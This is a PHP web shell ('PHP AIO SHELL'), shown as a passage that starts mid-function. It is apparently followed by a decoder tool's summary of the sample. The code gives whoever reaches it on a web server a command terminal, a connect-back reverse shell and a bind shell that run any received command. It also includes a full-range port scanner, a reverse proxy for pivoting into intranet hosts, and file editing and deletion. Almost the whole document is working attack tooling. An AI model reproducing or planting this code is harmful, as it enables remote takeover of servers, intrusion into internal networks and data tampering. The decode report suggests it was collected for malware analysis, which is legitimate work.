		<input type="submit" value="Edit"/>
		</form>';
	}
	else {
		$fp=@fopen($file_name, "w+");
		$result=@fwrite($fp, $_POST['newcontent']);
		@fclose($fp);
		if ($result == false) {
			echo "edit failed.";
		}
		else {
			echo "edit ok.";
		}
	}

}

function rename_file($old_file_name, $new_file_name)
{
	if (file_exists($old_file_name) == false) {
		echo "file $old_file_name not exist.\n";
		return -1;
	}

	if (rename($old_file_name, $new_file_name) == false) {
		echo "rename $old_file_name to $new_file_name failed.\n";
		return -1;
	}

	echo "rename $old_file_name to $new_file_name ok.\n";
	return 0;
}

function get_human_size($bytes)
{
	$type=array("Bytes", "KB", "MB", "GB", "TB");
	$idx=0;

	while ($bytes >= 1024) {
		$bytes /= 1024;
		$idx++;
	}

	return (intval($bytes)." ".$type[$idx]);
}

function get_file_perms($file_name)
{
	return (substr(sprintf('%o', fileperms($file_name)), -4));
}


function get_human_file_perms($file_name)
{
	$perms = fileperms($file_name);

	if (($perms & 0xC000) == 0xC000) {
    		$info = 's';
	} elseif (($perms & 0xA000) == 0xA000) {
		$info = 'l';
	} elseif (($perms & 0x8000) == 0x8000) {
		$info = '-';
	} elseif (($perms & 0x6000) == 0x6000) {
    		$info = 'b';
	} elseif (($perms & 0x4000) == 0x4000) {
    		$info = 'd';
	} elseif (($perms & 0x2000) == 0x2000) {
		$info = 'c';
	} elseif (($perms & 0x1000) == 0x1000) {
		$info = 'p';
	} else {
		$info = 'u';
	}

	$info .= (($perms & 0x0100) ? 'r' : '-');
	$info .= (($perms & 0x0080) ? 'w' : '-');
	$info .= (($perms & 0x0040) ?
		(($perms & 0x0800) ? 's' : 'x' ) :
		(($perms & 0x0800) ? 'S' : '-'));

	$info .= (($perms & 0x0020) ? 'r' : '-');
	$info .= (($perms & 0x0010) ? 'w' : '-');
	$info .= (($perms & 0x0008) ?
		(($perms & 0x0400) ? 's' : 'x' ) :
		(($perms & 0x0400) ? 'S' : '-'));

	$info .= (($perms & 0x0004) ? 'r' : '-');
	$info .= (($perms & 0x0002) ? 'w' : '-');
	$info .= (($perms & 0x0001) ?
		(($perms & 0x0200) ? 't' : 'x' ) :
		(($perms & 0x0200) ? 'T' : '-'));

	return $info;
}

function get_file_owner($file_name)
{
	$uid=fileowner($file_name);
        $user_info = posix_getpwuid($uid);

        return $user_info['name'];
}

function read_dir($dir_path)
{
	if (is_dir($dir_path)) {
		if (($dp = opendir($dir_path)) == false) {
			echo "open $dir_path failed.\n";
			return -1;
		}
		while (($file_name = readdir($dp)) != false) {
			if ($file_name == "." || $file_name == "..")
				continue;
			$sub_path = $dir_path."/".$file_name;
			echo "$sub_path\n";
		}
	}

	closedir($dp);
	return 0;
}

function read_dirs($dir_path)
{
	echo '
<table>
<tr class="banner">
<td width="400" >Filename</td>
<td width="400" >Last modified</td>
<td width="400" >Size</td>
<td width="400" >Chmod/Perms</td>
<td width="400" >Action</td>
</tr>';

        if (is_dir($dir_path)) {
                if (($dp = opendir($dir_path)) == false) {
                        echo "open $dir_path failed.\n";
                        return -1;
                }
                while (($file_name = readdir($dp)) != false) {
                        if ($file_name == "." || $file_name == "..")
                                continue;
                        $sub_path = $dir_path."/".$file_name;
			$last_modify_time=date("Y/m/d H:i:s", fileatime($file_name));
			$file_size=filesize($file_name);
			$file_size_string=get_human_size($file_size);
			$file_perms=get_file_perms($file_name);
			$file_perms_string=get_human_file_perms($file_name);
			$file_owner=get_file_owner($file_name);
			
			echo '<tr class="directory">
			<td width="400" ><a href='.$file_name.'>'.$file_name.'</a></td>
			<td width="400" >'.$last_modify_time.'</td>
			<td width="400" >'.$file_size_string.'</td>
			<td width="400" >'.$file_perms.' / '.$file_perms_string.' / '.$file_owner.'</td>
			<td width="400" ><a href="webshell.php?delete='.$file_name.'"'.'>Delete </a>
				<a href="webshell.php?edit='.$file_name.'"'.'>Edit </a>
				<a href="webshell.php?download='.$file_name.'"'.'>Download </a>
				<a href="webshell.php?rename='.$file_name.'"'.'>Rename </a>
			</td>
			</tr>';

                }
        }

	echo '</table>';

        closedir($dp);
        return 0;
}

function aio_directory()
{
	$curr_path=getcwd();

	return read_dirs($curr_path);
}


function search_file_by_name($dir_path, $target_file)
{
        if (is_dir($dir_path)) {
                if (($dp = opendir($dir_path)) == false) {
                        echo "open $dir_path failed.\n";
                        return -1;
                }
                while (($file_name = readdir($dp)) != false) {
                        if ($file_name == "." || $file_name == "..")
                                continue;

                        $sub_path = $dir_path."/".$file_name;
                        if (is_dir($sub_path)) {
                                search_file_by_name($sub_path, $target_file);
                        }

			if (!strcmp($file_name, $target_file)) {
				echo "found $target_file.\n";
				closedir($dp);
				return 0;
			}
                }

		echo "not found $target_file.\n";
        	closedir($dp);
        }

        return -1;
}

/**
 * show file attribute with cetern flag.
 *
 * @dir_path - directroy to search.
 * @attr_flag - 0 readable.
 *            - 1 writeable.
 *            - 2 executable.
 */
function show_attr_file($dir_path, $attr_flag)
{
        if (is_dir($dir_path)) {
                if (($dp = opendir($dir_path)) == false) {
                        echo "open $dir_path failed.\n";
                        return -1;
                }
                while (($file_name = readdir($dp)) != false) { 
                        if ($file_name == "." || $file_name == "..")
                                continue;

                        $sub_path = $dir_path."/".$file_name;
                        if (is_dir($sub_path)) {
                                show_attr_file($sub_path, $attr_flag);
                        }
		
			if ($attr_flag == 0) {
				if (is_readable($file_name)) 
					echo "$sub_path\n";
			}
			else if ($attr_flag == 1) {
				if (is_writable($file_name)) 
					echo "$sub_path\n";
			}
			else if ($attr_flag == 2) {
				if (is_executable($file_name)) 
					echo "$sub_path\n";
			}
			else {
				echo "wrong attribute flag.\n";
				break;
			}
		}
		closedir($dp);
	}

	return 0;
}

function create_dir($dir_path)
{
	if (file_exists($dir_path))
		return -1;

	if (mkdir($dir_path, 0700) == false) {
		echo "create $dir_path failed.\n";
		return -1;
	}
	echo "create $dir_path ok.\n";
	return 0;
}

function destroy_dir($dir_path)
{
	if (file_exists($dir_path) == false)
		return -1;

	if (rmdir($dir_path) == false) {
		echo "delete $dir_path failed.\n";
		return -1;
	}

	echo "delete $dir_path ok.\n";
	return 0;
}

function destroy_dirs($dir_path)
{
        if (is_dir($dir_path)) {
                if (($dp = opendir($dir_path)) == false) {
                        echo "open $dir_path failed.\n";
                        return -1;
                }
                while (($file_name = readdir($dp)) != false) {
                        if ($file_name == "." || $file_name == "..")
                                continue;
                        $sub_path = $dir_path."/".$file_name;

                        if (is_dir($sub_path)) {
                                destroy_dirs($sub_path);
                        }
			else
				delete_file($sub_path);
                }

        	closedir($dp);
		destroy_dir($dir_path);
        	return 0;
        }

        return 0;
}

function linux_id()
{
	$uid = posix_getuid();
	$user_info = posix_getpwuid($uid);

	echo "uid=".$uid."(".$user_info['name'].") ";
	echo "gid=".$user_info['gid']."(".$user_info['name'].") ";
	echo "dir=".$user_info['dir']." ";
	echo "shell=".$user_info['shell']."\n";
}

function linux_uname()
{
	$uname = posix_uname();

	echo $uname['sysname']." ".$uname['nodename']." ".$uname['release']." ";
	echo $uname['version']." ".$uname['machine'];
}

function get_proc_name($file_name)
{
        $fp = fopen($file_name, "r");
        if ($fp == false) {
                echo "open $file_name failed.\n";
                return -1;
        }

        while (($buf = fgets($fp, 1024)) != false ) {
		if (strstr($buf, "Name:") != NULL) {
			sscanf($buf, "%s %s", $tmp, $name);
			fclose($fp);
			return $name;
		}
        }

        fclose($fp);
        return 0;
}

function get_proc_cmd($file_name)
{
        $fp = fopen($file_name, "r");
        if ($fp == false) {
                echo "open $file_name failed.\n";
                return -1;
        }

	$cmd = fgets($fp, 1024);
	fclose($fp);

	return $cmd;
}

function linux_ps()
{
	if (($dp = opendir("/proc")) == false) {
		echo "open /proc failed.\n";
		return -1;
	}
	echo "open /proc ok.\n";

        while (($file_name = readdir($dp)) != false) {
        	if ($file_name == "." || $file_name == "..")
        		 continue;

		if (ctype_digit($file_name) == false)
			continue;
		
		$dir_path = "/proc/$file_name/status";
		$proc_name = get_proc_name($dir_path);

		$dir_path = "/proc/$file_name/cmdline";
		$proc_cmd = get_proc_cmd($dir_path);

		echo $file_name."\t\t".$proc_name." ".$proc_cmd."\n";
	}

	closedir($dp);
	return 0;
}

function tcp_connect($host, $port)
{
	$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
	if ($socket == false) {
		echo "create socket error.\n";
		return -1;
	}

	if (@socket_connect($socket, $host, $port) == false) {
		socket_close($socket);
		return -1;
	}

	return $socket;
}

function tcp_connect_timeout($host, $port, $timeout)
{
	$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
	if ($socket == false) {
		echo "create socket error.\n";
		return -1;
	}

	if (socket_set_nonblock($socket) == false) {
		echo "set nonblock error.\n";
		socket_close($socket);
		return -1;
	}

	$time = time();
	while (!@socket_connect($socket, $host, $port)) {
		$err = socket_last_error($socket);
		if ($err == 115 || $err == 114) {
			if ((time() - $time) >= $timeout) {
				socket_close($socket);
				echo "socket timeout.\n";
				return -1;
			}
			sleep(1);
			continue;
		}
		socket_close($socket);
		return -1;
	}
	
	echo "connect to $host:$port ok.\n";
	return $socket;
}

function run_proxy_client($remote_host1, $remote_port1, $remote_host2, $remote_port2)
{
        $socket1 = tcp_connect($remote_host1, $remote_port1);
        if ($socket1 == -1) {
                echo "connect to $remote_host1:$remote_port1 failed.\n";
                return -1;
        }
        echo "connect to $remote_host1:$remote_port1 ok.\n";

        $socket2 = tcp_connect($remote_host2, $remote_port2);
        if ($socket2 == -1) {
                echo "connect to $remote_host2:$remote_port2 failed.\n";
                socket_close($socket1);
                return -1;
        }
        echo "connect to $remote_host2:$remote_port2 ok.\n";

        run_proxy_core($socket1, $remote_host1, $socket2, $remote_host2);

        return 0;
}

function web_proxy_client()
{
        echo '<html><head><style>
                h3.banner
                {
                text-align:center;
                color:#384850;
                font-weight:bold;
                }
                form
                {
                text-align:center;
                }
                input[type=text]
                {
                width:300px;
                color:#384850;
                background-color:#ffffff;
                }
                input[type=submit]
                {
                width:80px;
                color:#384850;
                background-color:#ffffff;
                }
                </head></style>
                <body>
		<h3 class="banner">Linux reverse proxy</h3>
                <form action="" method="post">
		<b>intranet host</b>
                <input type="text" name="intranet_host" />
                <b>intranet port</b>
                <input type="text" name="intranet_port" /><br />
		<b>public host</b>
                <input type="text" name="public_host" />
                <b>public   port</b>
                <input type="text" name="public_port" /><br /><br />
                <input type="submit" value="Run" />
                </form>
                </body>
                </html>';

        if (empty($_POST['intranet_host']) || empty($_POST['intranet_port']) || 
		empty($_POST['public_host']) ||  empty($_POST['public_port']))
                return -1;

	run_proxy_client($_POST['intranet_host'], $_POST['intranet_port'],
			$_POST['public_host'], $_POST['public_port']);
}

function run_proxy_core($socket1, $remote_host1, $socket2, $remote_host2)
{
        while (true) {
                $read_sockets = array($socket1, $socket2);
                $write_sockets = NULL;
                $except_sockets = NULL;

                if (socket_select($read_sockets, $write_sockets, $except, 0) == -1) {
                        echo "socket_select error ".socket_strerror(socket_last_error())."\n";
                        break;
                }

                if (in_array($socket2, $read_sockets)) {
                        //echo "got data from $remote_host2.\n";

                        $bytes2 = socket_recv($socket2, $buf2, 1024, MSG_DONTWAIT);
                        if ($bytes2 == false) {
                                echo "socket_recv ".socket_strerror(socket_last_error($socket2))."\n";
                                break;
                        }
                        //echo "got bytes $bytes2.\n";

                        if ($bytes2 == 0) {
                                echo "recv no data from $remote_host2.\n";
                                break;
                        }

                        $ret2 = socket_send($socket1, $buf2, $bytes2, MSG_EOR);
                        if ($ret2 == false) {
                                echo "socket_send ".socket_strerror(socket_last_error($socket1))."\n";
                                break;
                        }
                        if ($ret2 != $bytes2) {
                                echo "send data failed.\n";
                                break;
                        }
                        //echo "write $ret2 bytes ok.\n";
                }
                if (in_array($socket1, $read_sockets)) {
                        //echo "got data from $remote_host1.\n";

                        $bytes1 = socket_recv($socket1, $buf1, 1024, MSG_DONTWAIT);
                        if ($bytes1 == false) {
                                echo "socket_recv ".socket_strerror(socket_last_error($socket1))."\n";
                                break;
                        }
                        //echo "got bytes $bytes1.\n";

                        if ($bytes1 == 0) {
                                echo "recv no data from $remote_host1.\n";
                                break;
                        }

                        $ret1 = socket_send($socket2, $buf1, $bytes1, MSG_EOR);
                        if ($ret1 == false) {
                                echo "socket_send ".socket_strerror(socket_last_error($socket2))."\n";
                                break;
                        }
                        if ($ret1 != $bytes1) {
                                echo "send data failed.\n";
                                break;
                        }
                        //echo "write $ret1 bytes ok.\n";
                }
        }

        echo "proxy done.\n";
        socket_close($socket1);
        socket_close($socket2);

        return 0;
}

function init_proxy_server($local_port)
{
        $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
        if ($socket == false) {
                echo "create socket error.\n";
                return -1;
        }

        if (socket_bind($socket, '0', $local_port) == false) {
                echo "bind sock error.\n";
                socket_close($socket);
                return -1;
        }

        if (socket_listen($socket) == false) {
                echo "listen sock error.\n";
                socket_close($socket);
                return -1;
        }
        echo "listen on port $local_port ok.\n";

        return $socket;
}


function run_proxy_server($local_port1, $local_port2)
{
        $socket1 = init_proxy_server($local_port1);
        if ($socket1 == -1)
                return -1;

        while (true) {
                if (($newsock1 = socket_accept($socket1)) !== false) {
                        socket_getpeername($newsock1, $ip1);
                        echo "got a client form $ip1\n";
                        break;
                }
        }
        $socket2 = init_proxy_server($local_port2);
        if ($socket2 == -1)
                return -1;

        while (true) {
                if (($newsock2 = socket_accept($socket2)) !== false) {
                        socket_getpeername($newsock2, $ip2);
                        echo "got a client form $ip2\n";
                        break;
                }
        }

        echo "start transmit data ...\n";
        run_proxy_core($newsock2, $ip2, $newsock1, $ip1);

        socket_close($socket2);
        socket_close($socket1);

        return 0;
}

function tcp_connect_port($host, $port, $timeout)
{
	$fp = @fsockopen($host, $port, $errno, $errstr, $timeout);
		
	return $fp;
}

function port_scan_fast($host, $timeout, $banner)
{
$general_ports = array(
		'21'=>'FTP',
		'22'=>'SSH',
		'23'=>'Telnet',
		'25'=>'SMTP',
		'79'=>'Finger',
		'80'=>'HTTP',
		'81'=>'HTTP/Proxy',
		'110'=>'POP3',
		'135'=>'MS Netbios',
		'139'=>'MS Netbios',
		'143'=>'IMAP',
		'162'=>'SNMP',
		'389'=>'LDAP',
		'443'=>'HTTPS',
		'445'=>'MS SMB',
		'873'=>'rsync',
		'1080'=>'Proxy/HTTP Server',
		'1433'=>'MS SQL Server',
		'2433'=>'MS SQL Server Hidden',
		'1521'=>'Oracle DB Server',
		'1522'=>'Oracle DB Server',
		'3128'=>'Squid Cache Server',
		'3129'=>'Squid Cache Server',
		'3306'=>'MySQL Server',
		'3307'=>'MySQL Server',
		'3500'=>'Squid Cache Server',
		'3389'=>'MS Terminal Service',
		'5800'=>'VNC Server',
		'5900'=>'VNC Server',
		'8080'=>'Proxy/HTTP Server',
		'10000'=>'Webmin',
		'11211'=>'Memcached'
		);

	echo '<table>';
		
	foreach($general_ports as $port=>$name) {
		if (($fp = tcp_connect_port($host, $port, $timeout)) != false) {
			if (empty($banner) == false) {
				$data = fgets($fp, 128);
				echo '<tr>
					<td>'.$host.'</td>
					<td>'.$port.'</td>
					<td>'.$name.'</td>
					<td>'.$data.'</td>
					</tr>';
			}
			else {
				echo '<tr>
					<td>'.$host.'</td>
					<td>'.$port.'</td>
					<td>'.$name.'</td>
					</tr>';
			}
			fclose($fp);
		}
	} 
	echo '</table>';
}

function port_scan($host, $src_port, $dst_port, $timeout, $banner)
{
	echo '<table>
		<tr>
		<td>Host</td>
		<td>Port</td>
		<td>State</td>
		</tr>';

        for ($port = $src_port; $port <= $dst_port; $port++) {
		if (($fp = tcp_connect_port($host, $port, $timeout)) != false) {
			if (empty($banner) == false) {
				$data = fgets($fp, 128);
				echo '<tr>
					<td>'.$host.'</td>
					<td>'.$port.'</td>
					<td>'.$data.'</td>
					</tr>';
			}
			else {
				echo '<tr>
					<td>'.$host.'</td>
					<td>'.$port.'</td>
					<td>OPEN</td>
					</tr>';
			}
			fclose($fp);
		}
        }
	echo '</table>';
}


function run_portscan()
{
	echo '<html>
		<head>
		<style>
		tr.directory
		{
		font-size:14px;
		text-align:left;
		height:20px;
		border:1px solid #98bf21;
		padding:2px 6px 2px 6px;
		}
		</style>
		</head>
		<body>
		<form action="" method="post">
		target host
		<input type="text" name="scan_host" value="127.0.0.1" />
		timeout
		<input type="text" name="scan_timeout" value="5" />
		general ports
		<input type="checkbox" name="scan_fast" />
		banner
		<input type="checkbox" name="scan_banner" />
		<input type="submit" value="scan" />
		</form>
		</body>
		</html>';

	if (empty($_POST['scan_host']))
		return -1;
	
	if (isset($_POST['scan_fast'])) {
		port_scan_fast($_POST['scan_host'], $_POST['scan_timeout'], 
				$_POST['scan_banner']);
	}
	else {
		port_scan($_POST['scan_host'], "1", "65535", 
				$_POST['scan_timeout'], 
				$_POST['scan_banner']);
	}
}

function linux_exec($socket, $cmd)
{
        $handle = popen($cmd, "r");

        while (($buf = fgets($handle, 1024)) != false) {
                $ret = socket_write($socket, $buf, strlen($buf));
                if ($ret == false) {
                        return -1;
                }
        }

        pclose($handle);
        return 0;
}

function connect_backdoor($host, $port)
{
        $banner = "connect back from phpshell\n";

        $socket = tcp_connect($host, $port);
        if ($socket == -1) {
		echo "connect to $host:$port failed.\n";
                return -1;
	}
	echo "connect to $host:$port ok.\n";

        $ret = socket_write($socket, $banner, strlen($banner));
        if ($ret == false) {
		echo "write data failed.\n";
                socket_close($socket);
                return -1;
        }

        while (true) {
                $buf = socket_read($socket, 1024);
                echo $buf;
                linux_exec($socket, $buf);
        }
}

function bindshell($local_port)
{
        $banner = "bindshell from phpshell\n";

        $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
        if ($socket == false) {
                echo "create socket error.\n";
                return -1;
        }

        if (socket_bind($socket, '0', $local_port) == false) {
                echo "bind sock error.\n";
                socket_close($socket);
                return -1;
        }

        if (socket_listen($socket) == false) {
                echo "listen sock error.\n";
                socket_close($socket);
                return -1;
        }
        echo "listen on port $local_port ok.\n";

        while (true) {
                if (($newsock = socket_accept($socket)) !== false) {
                        socket_getpeername($newsock, $ip);
                        echo "got a client form $ip"."<br />";
                        break;
                }
        }

        $ret = socket_write($newsock, $banner, strlen($banner));
        if ($ret == false) {
                echo "write data failed.\n";
                socket_close($newsock);
                socket_close($socket);
                return -1;
        }

        while (true) {
                $buf = socket_read($newsock, 1024);
                echo $buf;
                linux_exec($newsock, $buf);
        }

	socket_close($newsock);
	socket_close($socket);
	return 0;
}

function run_backdoor()
{
        echo '<html><head><style>
		h3.banner
		{
		text-align:center;
		color:#384850;
		font-weight:bold;
		}
		form
		{
		text-align:center;
		}
                input[type=text]
                {
                width:300px;
                color:#384850;
                background-color:#ffffff;
                }
                input[type=submit]
                {
                width:80px;
                color:#384850;
                background-color:#ffffff;
                }
		</head></style>
                <h3 class="banner" >Linux connect backdoor</h3>
                <form action="" method="post">
                Target host
                <input type="text" name="target_host" />
                Target port
                <input type="text" name="target_port" />
                <input type="submit" value="Connect" />
                </form>
		</br />
                <h3 class="banner" >Linux bindshell backdoor</h3>
                <form action="" method="post">
		Bind port
                <input type="text" name="bind_port" />
                <input type="submit" value="Bindshell" />
                </form>
		</html>';

        if ($_POST['target_host'] && $_POST['target_port']) {
                connect_backdoor($_POST['target_host'], $_POST['target_port']);
        }
	if ($_POST['bind_port']) {
		bindshell($_POST['bind_port']);
	}
}

/*
function exec_shell($cmd)
{
        $handle = popen($cmd, "r");

        while (($buf = fgets($handle, 1024)) != false) {
		echo $buf;
        }

        pclose($handle);
        return 0;
}

function run_shell()
{
	$host_name = gethostbyaddr($_SERVER['SERVER_NAME']);
        $uid = posix_getuid();
        $user_info = posix_getpwuid($uid);

	echo '<html>
		<head>
		<style>
                input[type=text]
                {
                width:1130px;
                color:#384850;
                background-color:#ffffff;
                }
		textarea
		{
                width:1130px;
                color:#384850;
                background-color:#ffffff;
		}
		</style>
		</head>
		<body>
		<form action="" method="post">
		<font color="#384850">'.$user_info['name'].'@'.$host_name.'$</font>
		<input style="border:none" color="#384850" type="text" name="shellcmd" />
		<input style="border:none" color="#384850" type="submit" value="Execute" /><br /><br />
		<textarea name="textarea" cols="150" rows="30" readonly>';

	if ($_POST['shellcmd']) {
		//echo $user_info['name'].'@'.$host_name.'$';
		//echo $_POST['shellcmd'];
		exec_shell($_POST['shellcmd']);
		echo '</textarea></form></body></html>';
	}
}
*/

function run_terminal_shell($cmd)
{
        $handle = popen($cmd, "r");

        while (($buf = fgets($handle, 1024)) != false) {
                $data .= $buf."";
        }

        pclose($handle);
        return $data;
}

function aio_shell()
{
        $host_name = gethostbyaddr($_SERVER['SERVER_NAME']);
        $uid = posix_getuid();
        $user_info = posix_getpwuid($uid);
	$curr_path = getcwd();
	$prompt=$user_info['name'].'@'.$host_name.':'.$curr_path;

        echo '<html>
        <head>
        <style>
        tr.banner
        {
        font-size: 18px;
        font-style:italic;
        color:#ffffff;
        background-color: #285070;
        }
        tr.prompt
        {
        font-size: 14px;
        color:#285800;
        background-color: #000000;
        }
        textarea {border: none; margin: 0px; padding: 2px 2px 2px; color: #285800; background-color: #000000;}
        input
        {
        color: #285800; background-color: #000000;
        }
        </style>
        <script type="text/javascript" language="JavaScript">
        function init()
        {
                document.shell.output.scrollTop = document.shell.output.scrollHeight;
        }
        </script>
        </head>
        <body onload="init()">
        <table align="center" border="0" width="600" cellpadding="0" cellspacing="0">
        <tr class="banner">
                <td width="10%"><b>TERMINAL</b></td>
                <td align="center">'.$prompt.'</td>
        </tr>

        <form name="shell" action="" method="post">
        <tr class="prompt">
        <td colspan="2" nowrap>
        <textarea name="output" rows="20" cols="90">';
        if ($_POST['shellcmd']) {
                $cmd_data = $prompt.'$'.$_POST['shellcmd']."\n";
                $cmd_data .= run_terminal_shell($_POST['shellcmd']);
                $_SESSION['output'] .= $cmd_data;
                echo $_SESSION['output'];
        }

        echo '</textarea><br />'.$prompt.'$'.'
        <input style="border:none" type="text" name="shellcmd" />
        <input style="border:none" type="submit" value="" />
</td>
</tr>
</form>

<tr class="banner">
        <td align="center" height="20" colspan="2"> &copy wzt 2014 http://www.cloud-sec.org</td>
</tr>
</table>
</body>
</html>';

}

function webshell_main()
{
	if (isset($_GET['cmd'])) {
		if ($_GET['cmd'] == "backdoor") {
			run_backdoor();
		}
		if ($_GET['cmd'] == "shell") {
			aio_shell();
		}
		if ($_GET['cmd'] == "portscan") {
			run_portscan();
		}
		if ($_GET['cmd'] == "proxy") {
			web_proxy_client();
		}
	}
	else {
		echo '<html>
		<body>
		<table border="0" cellpadding="10"  cellspacing="20">
		<tr>
		<td><a href="webshell.php?cmd=showdir">show directorys</a></td>
		<td><a href="webshell.php?cmd=backdoor">connect backdoor</a></td>
		<td><a href="webshell.php?cmd=portscan">port scan</a></td>
		<td><a href="webshell.php?cmd=proxy">reverse proxy</a></td>
		<td><a href="webshell.php?cmd=shell">cmd shell</a></td>
		</tr>
		</body>
		</html>';
	}
}

function aio_main()
{
	$uid = posix_getuid();
	$user_info = posix_getpwuid($uid);

	$uid_banner="uid=".$uid."(".$user_info['name'].") ".
                	"gid=".$user_info['gid']."(".$user_info['name'].") ".
                	"dir=".$user_info['dir']." ".
                	"shell=".$user_info['shell'];

	$uname = posix_uname();

	$uname_banner=$uname['sysname']." ".$uname['nodename']." ".$uname['release']." ".
                	$uname['version']." ".$uname['machine'];

	$server_addr=$_SERVER['SERVER_NAME'];
	$server_port= $_SERVER['SERVER_PORT'];

	$server_time=date("Y/m/d h:i:s",time());
	$phpsoft=$_SERVER['SERVER_SOFTWARE'];
	$php_version=PHP_VERSION;
	$zend_version=zend_version();
	$dis_func=get_cfg_var("disable_functions");
	$safemode=@ini_get('safe_mode');
	if ($safemode == false)
		$safemode="On";
	$cwd_path=getcwd();
	$total_disk=disk_total_space("/");
	$total_disk_gb=intval($total_disk/(1024*1024*1024));
	$free_disk=disk_free_space("/");
	$free_disk_gb=intval($free_disk/(1024*1024*1024));
echo '<html>
<head>
<style>
body
{
background-color:#FFFFFF;
}

ul.banner
{
list-style-type:none;
margin:0;
padding:0;
text-align:center;
color:#384850;
background-color:gray;
font-size:20px;
font-weight:bold;
}

ul.directory
{
font-size:14px;
text-align:left;
font-weight: bold;
}

li
{
display:inline;
}

a:link
{
color:#384850;
}
a:visited
{
color:#384850;
}
a:hover
{
color:#384850;
}
a:active
{
color:#384850;
}

h2.banner
{
text-align:center;
color:#384850;
font-weight:bold;
}

table.banner
{
font-size:14px;
}

tr.banner
{
font-size:16px;
color:#384850;
background-color:gray;
}

tr.directory
{
font-size:14px;
text-align:left;
height:20px;
border:1px solid #98bf21;
padding:2px 6px 2px 6px;
}

p.banner
{
font-size:14px;
}

</style>
</head>

<body>
<h2 class="banner">PHP AIO SHELL</h2>
<hr />
<table class="banner">
<tr>
<td width="1200" >User: '.$uid_banner.'</td>
<td width="200" align="center" >'.$server_time.'</td>
</tr>
<tr>
<td width="1200" >Uname: '.$uname_banner.'</td>
<td width="200" align="center" >'.$server_addr.":".$server_port.'</td>
</tr>
</table>
<hr />

<p class="banner">Software: '.$phpsoft.' | PHP: '.$php_version.' | ZEND: '.$zend_version.'
 | Safemode: '.$safemode.' | disfunc: '.$dis_func.'
</p>

<table class="banner">
<tr>
<td width="200" align="left">Directroy: '.$cwd_path.'</td>
<td width="200" >Disk: total '.$total_disk_gb.'GB free '.$free_disk_gb.'GB </td>
</tr>
</table>
<br />

<ul class="banner">
<li><a href="webshell.php?cmd=dir">[Directorys]</a></li>
<li><a href="webshell.php?cmd=backdoor">[Backdoor]</a></li>
<li><a href="webshell.php?cmd=portscan">[PortScan]</a></li>
<li><a href="webshell.php?cmd=proxy">[Proxy]</a></li>
<li><a href="webshell.php?cmd=shell">[Shell]</a></li>
<li><a href="webshell.php?cmd=crack">[Crack]</a></li>
<li><a href="webshell.php?cmd=mysql">[Mysql]</a></li>
</ul>
<br />

</body>
</html>';

        if ($_GET['cmd']) {
		if ($_GET['cmd'] == "dir") {
			aio_directory();
		}
                if ($_GET['cmd'] == "backdoor") {
                        run_backdoor();
                }
                if ($_GET['cmd'] == "shell") {
                        aio_shell();
                }
                if ($_GET['cmd'] == "portscan") {
                        run_portscan();
                }
                if ($_GET['cmd'] == "proxy") {
                        web_proxy_client();
                }
        }

	if ($_GET['delete']) {
		delete_file($_GET['delete']);	
	}
	if ($_GET['edit']) {
		edit_file($_GET['edit']);
	}
}

aio_main();
?>

Function Calls

aio_main 1
posix_getuid 1
session_start 1
error_reporting 1

Variables

None

Stats

MD5 29836a2f5e2362706dd3d219a8db5a8f
Eval Count 0
Decode Time 234 ms